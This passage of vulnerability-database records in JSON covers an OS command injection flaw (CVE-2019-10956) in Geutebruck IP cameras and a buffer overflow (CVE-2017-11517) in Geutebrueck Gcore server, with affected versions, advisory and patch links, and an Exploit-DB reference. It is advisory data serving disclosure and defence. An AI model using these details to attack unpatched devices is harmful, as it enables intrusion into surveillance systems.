        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated user, using a specially crafted URL command, to execute commands as root. Geutebruck IP Camera G-Code and G-Cam In OS A command injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input data constructs executable commands for the operating system, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute illegal operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.4
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 1.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "id": "VAR-202001-1487",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:41.399000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213553"
          },
          {
            "title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93177"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.6,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10956"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10956"
          },
          {
            "trust": 0.7,
            "url": "https://www.securityfocus.com/bid/108579"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "date": "2020-01-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "date": "2020-01-17T18:15:12.040000",
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22346"
          },
          {
            "date": "2020-01-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10956"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          },
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          },
          {
            "date": "2024-11-21T04:20:13.833000",
            "db": "NVD",
            "id": "CVE-2019-10956"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Camera G-Code and  G-Cam In  OS Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014194"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-088"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2017-11517 (GCVE-0-2017-11517)

    Vulnerability from nvd – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25
    VLAI
    Summary
    Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    URL Tags
    https://www.exploit-db.com/exploits/41153/ exploitx_refsource_EXPLOIT-DB
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T18:12:40.088Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "41153",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/41153/"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-07-21T20:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "41153",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/41153/"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2017-11517",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "41153",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/41153/"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2017-11517",
        "datePublished": "2017-07-21T20:00:00.000Z",
        "dateReserved": "2017-07-21T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:25:55.226Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-11517 (GCVE-0-2017-11517)

    Vulnerability from cvelistv5 – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25
    VLAI
    Summary
    Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References
    URL Tags
    https://www.exploit-db.com/exploits/41153/ exploitx_refsource_EXPLOIT-DB
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T18:12:40.088Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "41153",
                "tags": [
                  "exploit",
                  "x_refsource_EXPLOIT-DB",
                  "x_transferred"
                ],
                "url": "https://www.exploit-db.com/exploits/41153/"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2017-07-21T20:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "name": "41153",
              "tags": [
                "exploit",
                "x_refsource_EXPLOIT-DB"
              ],
              "url": "https://www.exploit-db.com/exploits/41153/"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2017-11517",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "41153",
                  "refsource": "EXPLOIT-DB",
                  "url": "https://www.exploit-db.com/exploits/41153/"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2017-11517",
        "datePublished": "2017-07-21T20:00:00.000Z",
        "dateReserved": "2017-07-21T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:25:55.226Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }